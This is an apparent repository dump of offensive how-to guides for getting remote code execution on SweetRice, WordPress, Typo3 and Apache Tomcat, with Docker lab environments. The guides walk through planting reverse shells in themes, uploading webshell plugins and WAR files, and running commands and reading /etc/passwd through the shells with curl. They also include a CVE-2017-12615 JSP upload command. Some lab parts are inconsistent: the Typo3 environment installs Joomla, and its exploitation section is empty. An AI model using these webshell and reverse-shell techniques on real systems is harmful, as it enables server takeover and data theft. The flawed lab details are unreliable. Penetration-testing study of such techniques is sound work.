4 | 5 | - https://www.sweetrice.xyz/ 6 | 7 | ## Techniques to achieve RCE on SweetRice 8 | 9 | ### With admin credentials 10 | 11 | - [Modify theme to include php code](./techniques/Modify-theme-to-include-php-code/) 12 | - [Add an shell Ad](./techniques/Add-ADS/) 13 | 14 | -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/SweetRice/techniques/Add-ADS/README.md: -------------------------------------------------------------------------------- 1 | # SweetRice - Add an shell ad 2 | 3 | ## Requirements 4 | 5 | - A valid **username and password** of a user with **admin rights** on the SweetRice. 6 | 7 | ## Exploitation 8 | 9 | ### Accessing the dashboard 10 | 11 | Connect with a user with administrative rights on the SweetRice at [http://TARGET/as/](http://TARGET/as). 12 | 13 | ![](./imgs/dashboard.png) 14 | 15 | ### Installing the plugin 16 | 17 | Then go on the "Ads" page. 18 | 19 | ![](./imgs/ads_page.png) 20 | 21 | ### Get you favorite PHP Reverse shell 22 | 23 | Here we using the pentestmonkey's reverse shell (https://github.com/pentestmonkey/php-reverse-shell) 24 | 25 | ![](./imgs/add_ad.png) 26 | 27 | ### Using the ad 28 | 29 | To use the webshell ad, just access this page http://TARGET/inc/ads/shell.php 30 | 31 | ![](./imgs/shell.png) 32 | 33 | ## References 34 | 35 | - https://www.sweetrice.xyz/ 36 | - https://github.com/pentestmonkey/php-reverse-shell -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/SweetRice/techniques/Add-ADS/imgs/add_ad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/SweetRice/techniques/Add-ADS/imgs/add_ad.png -------------------------------------------------------------------------------- 
--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/SweetRice/techniques/Add-ADS/technique.json:
--------------------------------------------------------------------------------
{
    "name": "SweetRice - Add an shell ad",
    "work_in_progress": false,
    "references": [
        "https://www.sweetrice.xyz/",
        "https://github.com/pentestmonkey/php-reverse-shell"
    ]
}
--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/SweetRice/techniques/Add-ADS/test_env/Dockerfile:
--------------------------------------------------------------------------------
FROM debian:latest

RUN apt-get -y -q update ;\
    apt-get -y -q install apache2 xxd git unzip wget php php-zip php-mysql mariadb-client mariadb-server

# Username: db
# Password: db
RUN service mariadb start ;\
    mysql -u root -e "CREATE USER 'db'@'%' IDENTIFIED BY 'db'; GRANT ALL PRIVILEGES ON *.* TO 'db'@'%' WITH GRANT OPTION; FLUSH PRIVILEGES;"

# Serve the SweetRice sources straight from the Apache web root
RUN rm /var/www/html/index.html; git clone "https://github.com/sweetrice/SweetRice" /var/www/html/

RUN chown www-data: -R /var/www/

RUN echo "#!/bin/bash" > /entrypoint.sh ;\
    echo "service mariadb start" >> /entrypoint.sh ;\
    echo "apachectl -D FOREGROUND" >> /entrypoint.sh ;\
    chmod +x /entrypoint.sh

WORKDIR /var/www/html/

EXPOSE 80

CMD /entrypoint.sh

--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/SweetRice/techniques/Add-ADS/test_env/Makefile:
--------------------------------------------------------------------------------
.PHONY: build img

IMGNAME := awesome_rce_sweetrice

all : build

build:
	docker build -t $(IMGNAME):latest -f Dockerfile .

start: build
	docker run --rm -it -p 10080:80 $(IMGNAME)

background:
	docker run --rm -d -p 10080:80 $(IMGNAME)

shell:
	docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash

stop:
	docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}')
--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/SweetRice/techniques/Modify-theme-to-include-php-code/README.md:
--------------------------------------------------------------------------------
# SweetRice - Modify theme to include PHP code

## Requirements

- A valid **username and password** of a user with **admin rights** on SweetRice.

## Exploitation

### Accessing the dashboard

Connect with a user with administrative rights on SweetRice at [http://TARGET/as/](http://TARGET/as/).

![](./imgs/dashboard.png)

### Accessing the theme editor

Now access the theme editor under "Theme" at [http://TARGET/as/?type=theme](http://TARGET/as/?type=theme)

![](./imgs/theme_editor.png)

Then edit the theme to add PHP code inside the page:

![](./imgs/reverse_shell.png)

You can find reverse shell PHP payloads here: https://podalirius.net/en/articles/unix-reverse-shells-cheatsheet/#php

### Enjoy your shell

Now, prepare your listener with netcat (`nc -lvp <PORT>`) [here we use pwncat] and enjoy your shell:

![](./imgs/reverse_shell_received.png)

## References
- https://www.sweetrice.xyz/
- https://podalirius.net/en/articles/unix-reverse-shells-cheatsheet/#php
--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/SweetRice/techniques/Modify-theme-to-include-php-code/technique.json:
--------------------------------------------------------------------------------
{
    "name": "SweetRice - Modify theme to include PHP code",
    "work_in_progress": false,
    "references": [
        "https://www.sweetrice.xyz/",
        "https://podalirius.net/en/articles/unix-reverse-shells-cheatsheet/#php"
    ]
}
--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Typo3/README.md:
--------------------------------------------------------------------------------
# Typo3

TYPO3 is a free and open-source web content management system written in PHP. It is released under the GNU General Public License. It can run on several web servers, such as Apache, Nginx or IIS, on top of many operating systems, among them Linux, Microsoft Windows, FreeBSD, macOS and OS/2.

## Techniques to achieve RCE on Typo3

### With admin credentials

- [Arbitrary deserialisation](./techniques/Arbitrary-deserialisation/README.md)

--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Typo3/techniques/Arbitrary-deserialisation/README.md:
--------------------------------------------------------------------------------
# Typo3 - Arbitrary deserialisation

## Requirements

- A valid **username and password** of a user with **admin rights** on Typo3.

## Exploitation

## References
- https://www.synacktiv.com/publications/typo3-leak-to-remote-code-execution.html
--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Typo3/techniques/Arbitrary-deserialisation/technique.json:
--------------------------------------------------------------------------------
{
    "name": "Typo3 - Arbitrary deserialisation",
    "work_in_progress": false,
    "references": [
        "https://www.synacktiv.com/publications/typo3-leak-to-remote-code-execution.html"
    ]
}
--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Typo3/techniques/Arbitrary-deserialisation/test_env/Dockerfile:
--------------------------------------------------------------------------------
FROM debian:buster

RUN apt-get -y -q update; \
    apt-get -y -q install apache2 xxd git unzip wget php php-simplexml php-gd php-ldap php-zip php-imap php-mysql php-mbstring mariadb-client mariadb-server

# Username: db
# Password: db
RUN service mysql start;\
    mysql -u root -e "CREATE USER 'db'@'%' IDENTIFIED BY 'db'; UPDATE mysql.user set plugin = 'mysql_native_password' WHERE User = 'db'; GRANT ALL PRIVILEGES ON *.* TO 'db'@'%' WITH GRANT OPTION; FLUSH PRIVILEGES;"

# Downloads and unpacks the Joomla 4.1.3 package (not a TYPO3 release) into the web root
RUN wget 'https://downloads.joomla.org/cms/joomla4/4-1-3/Joomla_4-1-3-Stable-Full_Package.zip?format=zip' -O /tmp/Joomla.zip ;\
    cd /var/www/html/; rm index.html; unzip /tmp/Joomla.zip

RUN chown www-data: -R /var/www/

RUN echo "#!/bin/bash" > /entrypoint.sh ;\
    echo "service mysql start" >> /entrypoint.sh ;\
    echo "apachectl -D FOREGROUND" >> /entrypoint.sh ;\
    chmod +x /entrypoint.sh

EXPOSE 80

CMD /entrypoint.sh

--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Typo3/techniques/Arbitrary-deserialisation/test_env/Makefile:
--------------------------------------------------------------------------------
.PHONY: build img

IMGNAME := awesome_rce_typo3_arbitrary_deserialization
PORT := 10080

all : build

build:
	docker build -t $(IMGNAME):latest -f Dockerfile .

start: build
	docker run --rm -it -p $(PORT):80 $(IMGNAME)

background:
	docker run --rm -d -p $(PORT):80 $(IMGNAME)

shell:
	docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash

stop:
	docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}')
--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Wordpress/README.md:
--------------------------------------------------------------------------------
# Wordpress

WordPress is a free and open-source content management system written in PHP and paired with a MySQL or MariaDB database. Features include a plugin architecture and a template system, referred to within WordPress as Themes.

## Techniques to achieve RCE on Wordpress

### With admin credentials

- [Modify theme to include PHP code](./techniques/Modify-theme-to-include-php-code/)
- [Upload a plugin](./techniques/Upload-a-plugin/)
- [Install File Management Plugin](techniques/Install-FileManagement-Plugin/)

--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Wordpress/techniques/Install-FileManagement-Plugin/README.md:
--------------------------------------------------------------------------------
# Wordpress - Install File Management Plugin

In case uploading a plugin is not possible for any reason related to the custom Wordpress configuration or the web server configuration (maximum upload size), you might be able to install a file management plugin instead and create a new file that will contain your shell code.

## Requirements

- A valid **username and password** of a user with **admin rights** on Wordpress.

## Exploitation

### Accessing the dashboard

Connect with a user with administrative rights on Wordpress at [http://TARGET/wp-login.php](http://TARGET/wp-login.php).

### Installing the plugin

- Go to the "Plugins" --> "Add New" page.

![](./imgs/add_new.png)

- In the next step, type "File Manager" in the search bar and install any of the file management plugins listed (the first one is recommended). Activate the plugin from the same page after installing it.

![](./imgs/Installing_filemanager.png)

### Using the plugin

- On the side bar you will find the plugin name; navigate to its page.

![](./imgs/plugin_page.png)

- Right click on the icon for creating a new file --> choose "plain txt" --> change the filename extension from `.txt` to `.php`

![](./imgs/creating_new_file.png)

- Select the created file --> right click --> navigate to the code editor.

![](./imgs/code_edit.png)

- Paste your PHP webshell code.

![](./imgs/paste_phpshellcode.png)

- Navigate to the main URL of your target with your created filename appended, for example [http://TARGET/NewFile.php](http://TARGET/NewFile.php)

- Execute the commands.

![](./imgs/execute_commands.png)

## References
- https://gist.github.com/joswr1ght/22f40787de19d80d110b37fb79ac3985
--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Wordpress/techniques/Install-FileManagement-Plugin/technique.json:
--------------------------------------------------------------------------------
{
    "name": "Wordpress - Install File Management Plugin ",
    "work_in_progress": false,
    "references": [
        "https://gist.github.com/joswr1ght/22f40787de19d80d110b37fb79ac3985"
    ]
}
--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Wordpress/techniques/Install-FileManagement-Plugin/test_env/Dockerfile:
--------------------------------------------------------------------------------
FROM debian:latest

ENV WORDPRESS_VERSION 5.9.3

RUN apt-get -y -q update; \
    apt-get -y -q install apache2 xxd git unzip wget php php-simplexml php-gd php-ldap php-zip php-imap php-mysql php-mbstring mariadb-client mariadb-server

# Username: db
# Password: db
# Database Name: db
RUN service mariadb start;\
    mysql -u root -e "CREATE DATABASE db; CREATE USER 'db'@'%' IDENTIFIED BY 'db'; GRANT ALL PRIVILEGES ON *.* TO 'db'@'%' WITH GRANT OPTION; FLUSH PRIVILEGES;"

RUN wget -q https://wordpress.org/wordpress-${WORDPRESS_VERSION}.tar.gz -O /tmp/wordpress.tar.gz ;\
    cd /var/www/html/; rm index.html; tar xf /tmp/wordpress.tar.gz

RUN chown www-data: -R /var/www/

RUN echo "#!/bin/bash" > /entrypoint.sh ;\
    echo "service mariadb start" >> /entrypoint.sh ;\
    echo "apachectl -D FOREGROUND" >> /entrypoint.sh ;\
    chmod +x /entrypoint.sh

EXPOSE 80

CMD /entrypoint.sh

--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Wordpress/techniques/Install-FileManagement-Plugin/test_env/Makefile:
--------------------------------------------------------------------------------
.PHONY: build img

IMGNAME := awesome_rce_wordpress_upload_plugin
PORT := 10080

all : build

build:
	docker build -t $(IMGNAME):latest -f Dockerfile .

start: build
	docker run --rm -it -p $(PORT):80 $(IMGNAME)

background:
	docker run --rm -d -p $(PORT):80 $(IMGNAME)

shell:
	docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash

stop:
	docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}')
--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Wordpress/techniques/Modify-theme-to-include-php-code/README.md:
--------------------------------------------------------------------------------
# Wordpress - Modify theme to include PHP code

## Requirements

- A valid **username and password** of a user with **admin rights** on Wordpress.

## Exploitation

### Accessing the dashboard

Connect with a user with administrative rights on Wordpress at [http://TARGET/wp-login.php](http://TARGET/wp-login.php).

![](./imgs/dashboard.png)

### Accessing the theme editor

Now access the theme editor under "Appearance / Editor" at [http://TARGET/wordpress/wp-admin/theme-editor.php](http://TARGET/wordpress/wp-admin/theme-editor.php)

![](./imgs/theme_editor.png)

Then edit the theme to add PHP code inside the page:

![](./imgs/reverse_shell.png)

You can find reverse shell PHP payloads here: https://podalirius.net/en/articles/unix-reverse-shells-cheatsheet/#php

### Enjoy your shell

Now, prepare your listener with netcat (`nc -lvp <PORT>`) and enjoy your shell:

![](./imgs/reverse_shell_received.png)

## References
- https://wordpress.org/
- https://podalirius.net/en/articles/unix-reverse-shells-cheatsheet/#php
--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Wordpress/techniques/Modify-theme-to-include-php-code/technique.json:
--------------------------------------------------------------------------------
{
    "name": "Wordpress - Modify theme to include PHP code",
    "work_in_progress": false,
    "references": [
        "https://wordpress.org/",
        "https://podalirius.net/en/articles/unix-reverse-shells-cheatsheet/#php"
    ]
}
--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Wordpress/techniques/Modify-theme-to-include-php-code/test_env/Dockerfile:
--------------------------------------------------------------------------------
FROM debian:latest

ENV WORDPRESS_VERSION 4.6.6

RUN apt-get -y -q update; \
    apt-get -y -q install apache2 xxd git unzip wget php php-simplexml php-gd php-ldap php-zip php-imap php-mysql php-mbstring mariadb-client mariadb-server

# Username: db
# Password: db
# Database Name: db
RUN service mariadb start;\
    mysql -u root -e "CREATE DATABASE db; CREATE USER 'db'@'%' IDENTIFIED BY 'db'; GRANT ALL PRIVILEGES ON *.* TO 'db'@'%' WITH GRANT OPTION; FLUSH PRIVILEGES;"

RUN wget -q https://wordpress.org/wordpress-${WORDPRESS_VERSION}.tar.gz -O /tmp/wordpress.tar.gz ;\
    cd /var/www/html/; rm index.html; tar xf /tmp/wordpress.tar.gz

RUN chown www-data: -R /var/www/

RUN echo "#!/bin/bash" > /entrypoint.sh ;\
    echo "service mariadb start" >> /entrypoint.sh ;\
    echo "apachectl -D FOREGROUND" >> /entrypoint.sh ;\
    chmod +x /entrypoint.sh

EXPOSE 80

CMD /entrypoint.sh

--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Wordpress/techniques/Modify-theme-to-include-php-code/test_env/Makefile:
--------------------------------------------------------------------------------
.PHONY: build img

IMGNAME := awesome_rce_wordpress_modify_theme
PORT := 10080

all : build

build:
	docker build -t $(IMGNAME):latest -f Dockerfile .

start: build
	docker run --rm -it -p $(PORT):80 $(IMGNAME)

background:
	docker run --rm -d -p $(PORT):80 $(IMGNAME)

shell:
	docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash

stop:
	docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}')
--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/README.md:
--------------------------------------------------------------------------------
# Wordpress - Upload a plugin

## Requirements

- A valid **username and password** of a user with **admin rights** on Wordpress.

## Exploitation

### Accessing the dashboard

Connect with a user with administrative rights on Wordpress at [http://TARGET/wp-login.php](http://TARGET/wp-login.php).

![](./imgs/dashboard.png)

### Installing the plugin

Then go to the "Upload plugin" page.

![](./imgs/upload_wp_term.png)

Now, upload the plugin [wpterm](./wpterm.1.1.9.zip) to get a webshell plugin into the Wordpress admin console.

![](./imgs/upload_wp_term.png)

### Using the plugin

To use the webshell plugin, just access this page: http://TARGET/wordpress/wp-admin/tools.php?page=wpterm

![](./imgs/wpterm_webshell.png)

## References
- https://wordpress.org/plugins/wpterm/
- https://github.com/p0dalirius/Wordpress-webshell-plugin
--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/WPterm_plugin.md:
--------------------------------------------------------------------------------
# Wordpress - Upload a plugin

## Requirements

- A valid **username and password** of a user with **admin rights** on Wordpress.

## Exploitation

### Accessing the dashboard

Connect with a user with administrative rights on Wordpress at [http://TARGET/wp-login.php](http://TARGET/wp-login.php).

![](./imgs/dashboard.png)

### Step 1: Upload the webshell plugin

First, log in with admin rights on the WordPress website and go to the "_Plugins --> Add New_" page, at http://TARGET/wordpress/wp-admin/plugin-install.php, and click on "Upload Plugin":

![](./imgs/plugin_add_new.png)

Upload the plugin, and click on "_Activate the plugin_":

![](./imgs/activate_plugin.png)

### Step 2.1: Executing commands

You can now execute commands by sending a GET or POST request to http://TARGET/wordpress/wp-content/plugins/wp_webshell/wp_webshell.php with `action=exec&cmd=id`:

```sh
$ curl -X POST 'http://TARGET/wordpress/wp-content/plugins/wp_webshell/wp_webshell.php' --data "action=exec&cmd=id"
{"stdout":"uid=33(www-data) gid=33(www-data) groups=33(www-data)\n","exec":"id"}
```

You can also access it by a GET request from a browser:

![](./imgs/exec_code_web.png)

### Step 2.2: Downloading files

You can also download remote files by sending a GET or POST request to http://TARGET/wordpress/wp-content/plugins/wp_webshell/wp_webshell.php with `action=download&path=/etc/passwd`:

```sh
$ curl -X POST 'http://TARGET/wordpress/wp-content/plugins/wp_webshell/wp_webshell.php' --data "action=download&path=/etc/passwd" -o-
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
mysql:x:101:101:MySQL Server,,,:/nonexistent:/bin/false
```

You can also download a remote file from a browser with a GET request:

![](./imgs/download_file_web.png)

### Step 3: The interactive console

When your webshell is active, you can use the interactive [console.py](console.py) to execute commands and download remote files.
https://user-images.githubusercontent.com/79218792/169876672-7ecd50a4-21f8-47d3-a575-ff2b81b5ec22.mp4

## References
- https://wordpress.org/plugins/wpterm/
- https://github.com/p0dalirius/Wordpress-webshell-plugin
--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/activate_plugin.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/activate_plugin.png
--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/dashboard.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/dashboard.png
--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/download_file_web.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/download_file_web.png
--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/exec_code_web.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/exec_code_web.png
--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/installing_plugin.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/installing_plugin.png
--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/list_of_installed_plugins.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/list_of_installed_plugins.png
--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/login.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/login.png
--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/plugin_add_new.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/plugin_add_new.png
--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/upload_plugin.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/upload_plugin.png
--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/upload_wp_term.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/upload_wp_term.png
--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/wpterm_webshell.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/wpterm_webshell.png
--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/technique.json:
--------------------------------------------------------------------------------
{
    "name": "Wordpress - Upload a plugin",
    "work_in_progress": false,
    "references": [
        "https://wordpress.org/plugins/wpterm/",
"https://github.com/p0dalirius/Wordpress-webshell-plugin" 7 | ] 8 | } -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/test_env/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:latest 2 | 3 | ENV WORDPRESS_VERSION 5.9.3 4 | 5 | RUN apt-get -y -q update; \ 6 | apt-get -y -q install apache2 xxd git unzip wget php php-simplexml php-gd php-ldap php-zip php-imap php-mysql php-mbstring mariadb-client mariadb-server 7 | 8 | # Username: db 9 | # Password: db 10 | # Database Name: db 11 | RUN service mariadb start;\ 12 | mysql -u root -e "CREATE DATABASE db; CREATE USER 'db'@'%' IDENTIFIED BY 'db'; GRANT ALL PRIVILEGES ON *.* TO 'db'@'%' WITH GRANT OPTION; FLUSH PRIVILEGES;" 13 | 14 | RUN wget -q https://wordpress.org/wordpress-${WORDPRESS_VERSION}.tar.gz -O /tmp/wordpress.tar.gz ;\ 15 | cd /var/www/html/; rm index.html; tar xf /tmp/wordpress.tar.gz 16 | 17 | RUN chown www-data: -R /var/www/ 18 | 19 | RUN echo "#!/bin/bash" > /entrypoint.sh ;\ 20 | echo "service mariadb start" >> /entrypoint.sh ;\ 21 | echo "apachectl -D FOREGROUND" >> /entrypoint.sh ;\ 22 | chmod +x /entrypoint.sh 23 | 24 | EXPOSE 80 25 | 26 | CMD /entrypoint.sh 27 | -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/test_env/Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: build img 2 | 3 | IMGNAME := awesome_rce_wordpress_upload_plugin 4 | PORT := 10080 5 | 6 | all : build 7 | 8 | build: 9 | docker build -t $(IMGNAME):latest -f Dockerfile . 

start: build
	docker run --rm -it -p $(PORT):80 $(IMGNAME)

background:
	docker run --rm -d -p $(PORT):80 $(IMGNAME)

shell:
	docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash

stop:
	docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}')
--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/wpterm.1.1.9.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/wpterm.1.1.9.zip
--------------------------------------------------------------------------------
/Frameworks/Apache-Tomcat/README.md:
--------------------------------------------------------------------------------
# Apache Tomcat

Apache Tomcat is an open-source implementation of the Java Servlet, JavaServer Pages, Java Expression Language and WebSocket technologies. Tomcat provides a "pure Java" HTTP web server environment in which Java code can run.

## Techniques to achieve RCE with Tomcat

### Generic

- [Deploy an application](./techniques/Deploy-an-application/README.md)

### Version specific

- [CVE-2017-12615 - PUT a jsp file](./techniques/CVE-2017-12615_-_PUT_a_jsp_file/README.md)

--------------------------------------------------------------------------------
/Frameworks/Apache-Tomcat/techniques/CVE-2017-12615_-_PUT_a_jsp_file/README.md:
--------------------------------------------------------------------------------
# Apache Tomcat - CVE-2017-12615 - PUT a jsp file

## Requirements

- None

## Exploitation

### Step 1: Whitelist your IP in the API

### Step 2: Upload your JSP file

```sh
curl -X PUT http://localhost/shell.jsp/ -d @- < test.jsp
```

## References
- https://tomcat.apache.org/
--------------------------------------------------------------------------------
/Frameworks/Apache-Tomcat/techniques/CVE-2017-12615_-_PUT_a_jsp_file/technique.json:
--------------------------------------------------------------------------------
{
    "name": "Apache Tomcat - CVE-2017-12615 - PUT a jsp file",
    "work_in_progress": false,
    "references": [
        "https://tomcat.apache.org/"
    ]
}
--------------------------------------------------------------------------------
/Frameworks/Apache-Tomcat/techniques/Deploy-an-application/README.md:
--------------------------------------------------------------------------------
# Apache Tomcat - Deploy an Application

## Requirements

- A valid **username and password** of a user with high privileges on Apache Tomcat.

## Exploitation

### Step 1: Access the Tomcat manager and upload the webshell application

First of all, you will need to access the Apache Tomcat `/manager` page at http://TARGET:10080/manager/html, and connect to it with a high-privilege account of the Apache Tomcat server.

![](./imgs/manager.png)

Compile the webshell application or download a release here: https://github.com/p0dalirius/Tomcat-application-webshell/. Then choose the WAR file of the [webshell application](https://github.com/p0dalirius/Tomcat-application-webshell/) and click on "Deploy":

![](./imgs/upload_a_plugin.png)

The application is now deployed:

![](./imgs/webshell_uploaded.png)

### Step 2.1: Executing commands

You can now execute commands by sending a GET or POST request to http://TARGET:10080/webshell/api with `action=exec&cmd=id`:

```sh
$ curl -X POST 'http://TARGET:10080/webshell/api' --data "action=exec&cmd=id"
{"stdout":"uid=0(root) gid=0(root) groups=0(root)\n","stderr":"","exec":["/bin/bash","-c","id"]}
```

You can also access it with a GET request from a browser:

![](./imgs/exec_code_web.png)

### Step 2.2: Downloading files

You can also download remote files by sending a GET or POST request to http://TARGET:10080/webshell/api with `action=download&path=/etc/passwd`:

```sh
$ curl -X POST 'http://TARGET:10080/webshell/api' --data "action=download&path=/etc/passwd" -o-
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
